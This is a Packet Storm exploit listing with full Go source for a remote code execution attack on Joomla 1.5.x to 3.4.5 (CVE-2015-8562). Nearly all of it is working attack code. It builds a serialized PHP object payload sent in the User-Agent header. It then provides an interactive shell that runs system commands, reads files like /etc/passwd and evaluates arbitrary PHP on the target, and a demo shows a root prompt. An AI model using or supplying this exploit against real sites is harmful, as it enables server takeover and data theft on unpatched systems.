Joomla 3.4.5 Object Injection

2015-12-3100:00:00
Khashayar Fereidani
packetstormsecurity.com
0.972 High
EPSS
Percentile
99.8%
JSON
`package main  
  
/*  
**************************************************************************  
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit  
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )  
* Version: 1.5.x to 3.4.5  
* CVE : CVE-2015-8562  
**************************************************************************  
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE  
* IS ON YOUR OWN RESPONSIBILITY  
**************************************************************************  
* How to run : (you need golang compiler from golang.org)  
* go run exploit.go http://target/path  
* or  
* go build exploit.go  
* ./exploit http://target/path  
**************************************************************************  
* DEMO :  
  
$ ./exploit 192.168.1.113/joomla  
###############################################  
# Joomla Remote Command Execution 0day Exploit  
# Exploited by: Khashayar Fereidani  
# http://fereidani.com  
# Vulnerable Versions: 1.5.x to 3.4.5  
###############################################  
  
Attacking to http://FILTERED.TLD/joomla/  
Target is vulnerable !  
# Command Line Documentation :  
read FILEPATH read file from FILEPATH  
dir DIRPATH list directory in DIRPATH  
exec COMMAND execute system command  
eval phpcode evaluate PHP Code  
help display this help  
exit close exploit console  
  
[*] Examples:  
read /etc/passwd  
dir /etc/  
exec ls -lah  
eval include('/etc/passwd')  
  
  
root@joomla:$ exec uname -a  
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
root@joomla:$  
  
*/  
  
import (  
"fmt"  
"net/http"  
"regexp"  
"os"  
"io/ioutil"  
"bytes"  
"net/http/cookiejar"  
"net/url"  
"bufio"  
"strings"  
)  
  
  
var target string;  
  
  
var helpString=`# Command Line Documentation :  
read FILEPATH read file from FILEPATH  
dir DIRPATH list directory in DIRPATH  
exec COMMAND execute system command  
eval phpcode evaluate PHP Code  
help display this help  
exit close exploit console  
  
[*] Examples:  
read /etc/passwd  
dir /etc/  
exec ls -lah  
eval include('/etc/passwd')  
  
`  
  
var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")  
  
var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")  
  
var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")  
  
var newLine=regexp.MustCompile("[\\n\\r]")  
  
var client *http.Client  
  
func newRequest(command string) *http.Request{  
values:=url.Values{}  
values.Set("1","echo('iMH3r3=');"+command+";")  
  
req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))  
  
if err!=nil{  
panic(err)  
}  
  
req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")  
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")  
return req  
}  
  
  
func escape(str string) string{  
return strings.Replace(str,"'","\\'",-1)  
}  
  
  
func runCommand(command string){  
res,err:=client.Do(newRequest(command))  
  
if err!=nil{  
fmt.Println(err.Error())  
}else{  
defer res.Body.Close()  
resBytes,err:=ioutil.ReadAll(res.Body)  
str:=string(resBytes)  
  
if err!=nil{  
fmt.Println(err)  
}  
match:=resultRegex.FindStringSubmatch(str)  
if len(match)>0{  
fmt.Print(match[0][7:])  
}  
}  
  
}  
  
  
func confirm() bool{  
res,err:=client.Do(newRequest(""))  
  
if err!=nil{  
fmt.Println(err)  
return false  
}else{  
if res.StatusCode==500{  
fmt.Println("Patched PHP Version :( !")  
return false  
}  
defer res.Body.Close()  
resBytes,err:=ioutil.ReadAll(res.Body)  
str:=string(resBytes)  
  
if err!=nil{  
fmt.Println(err)  
}  
match:=resultRegex.FindStringSubmatch(str)  
if len(match)>0{  
return true  
}else{  
return false  
}  
}  
}  
  
func main(){  
fmt.Print(`###############################################  
# Joomla Remote Command Execution 0day Exploit  
# Exploited by: Khashayar Fereidani  
# http://fereidani.com  
# Vulnerable Versions: 1.5.0 to 3.4.5  
###############################################  
`)  
options := cookiejar.Options{}  
  
jar, err := cookiejar.New(&options)  
if err != nil {  
panic(err)  
}  
  
client = &http.Client{  
Jar:jar,  
}  
  
  
  
if len(os.Args)<2{  
fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")  
return  
}  
  
target=os.Args[1]  
if(!validHttpUrl.MatchString(target)){  
target="http://"+target  
}  
  
if string(target[len(target)-1])!="/"{  
target+="/"  
}  
  
fmt.Println("Attacking to ",target)  
  
  
res,err:=client.Do(newRequest(""))  
if err!=nil{  
fmt.Println("Request Error:",err)  
return  
}  
ioutil.ReadAll(res.Body)  
res.Body.Close()  
  
if confirm(){  
fmt.Println("Target is vulnerable !")  
//runCommand("system('ls -la')")  
stdinreader := bufio.NewReader(os.Stdin)  
  
fmt.Println(helpString)  
for {  
var line string  
fmt.Print("root@joomla:$ ")  
line,_=stdinreader.ReadString('\n')  
line=newLine.ReplaceAllString(line,"")  
match:=cmdRegex.FindStringSubmatch(line)  
if len(match)<3 {  
if (line=="exit"){  
return  
}  
  
if !(line=="help"){  
fmt.Println("Wrong input !")  
}  
  
fmt.Println(helpString)  
}else{  
cmd:=match[1]  
input:=escape(match[2])  
switch cmd {  
case "exec":  
runCommand("system('"+input+"')")  
case "read":  
runCommand("readfile('"+input+"')")  
case "dir":  
runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}")  
case "eval":  
runCommand(match[2])  
}  
}  
}  
}else{  
fmt.Println("Target is not vulnerable!")  
}  
  
  
}  
`